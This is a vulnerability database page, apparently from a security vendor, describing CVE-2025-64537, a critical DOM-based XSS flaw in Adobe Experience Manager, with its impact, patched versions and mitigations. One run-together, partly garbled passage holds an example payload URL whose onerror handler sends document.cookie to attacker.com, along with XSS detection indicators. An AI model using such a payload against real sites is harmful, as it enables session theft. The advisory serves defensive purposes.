
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-64537 is a DOM-based Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that could lead to arbitrary code execution in the context of a victim's browser. It affects AEM versions 6.5.23 and earlier (on-premises), AEM 6.5 LTS, and AEM Cloud Service versions prior to 2025.12.0. Adobe disclosed and patched this vulnerability on December 9, 2025. It carries a CVSS v3.1 base score of 9.3 (Critical) (Adobe Advisory, Feedly).
The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically as a DOM-based XSS variant (CAPEC-588). The root cause is insufficient sanitization of user-controlled input that is written directly into the DOM, allowing injected scripts to execute in the victim's browser without server-side reflection. Exploitation requires no privileges and no special configuration, but does require user interaction — a victim must visit or be directed to a crafted malicious page. No technical write-up or public PoC code has been identified at this time (Adobe Advisory, Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser session, enabling session hijacking via cookie theft, credential capture, and unauthorized actions performed on behalf of the authenticated user. The CVSS scope is marked as "Changed," reflecting that the impact extends beyond the vulnerable component to the victim's browser environment. Confidentiality and integrity impacts are both rated High, as an attacker can achieve full session takeover and potentially compromise the entire AEM web application's security posture; availability is not directly impacted (Adobe Advisory, Feedly).
innerHTML, document.write(), or similar methods.https://target-aem.example.com/vulnerable-page.html#<img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.%3C, %3E, %22, onerror, javascript:) in query strings or referrer headers; web application firewall (WAF) alerts for XSS pattern matches against AEM URLs.Adobe has released patches addressing this vulnerability: AEM on-premises users should upgrade to version 6.5.24.0 or later; AEM Cloud Service users should update to the 2025.12.0 release or later. As interim mitigations, organizations should implement a strict Content Security Policy (CSP) to limit script execution, apply HTTP-only and Secure flags to session cookies, and validate/sanitize all user-supplied input at the application layer. Monitoring for suspicious script injection patterns via WAF rules is also recommended (Adobe Advisory).
The vulnerability was noted in CIS's December 2025 advisory covering multiple Adobe product vulnerabilities, and SOCRadar included it in their December 2025 Patch Tuesday coverage. Tenable published a detection plugin (Nessus plugin 278346) for this CVE. Community reaction has been routine, with no notable researcher commentary or significant social media discussion beyond standard vulnerability tracking (CIS Advisory, SOCRadar, Tenable).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."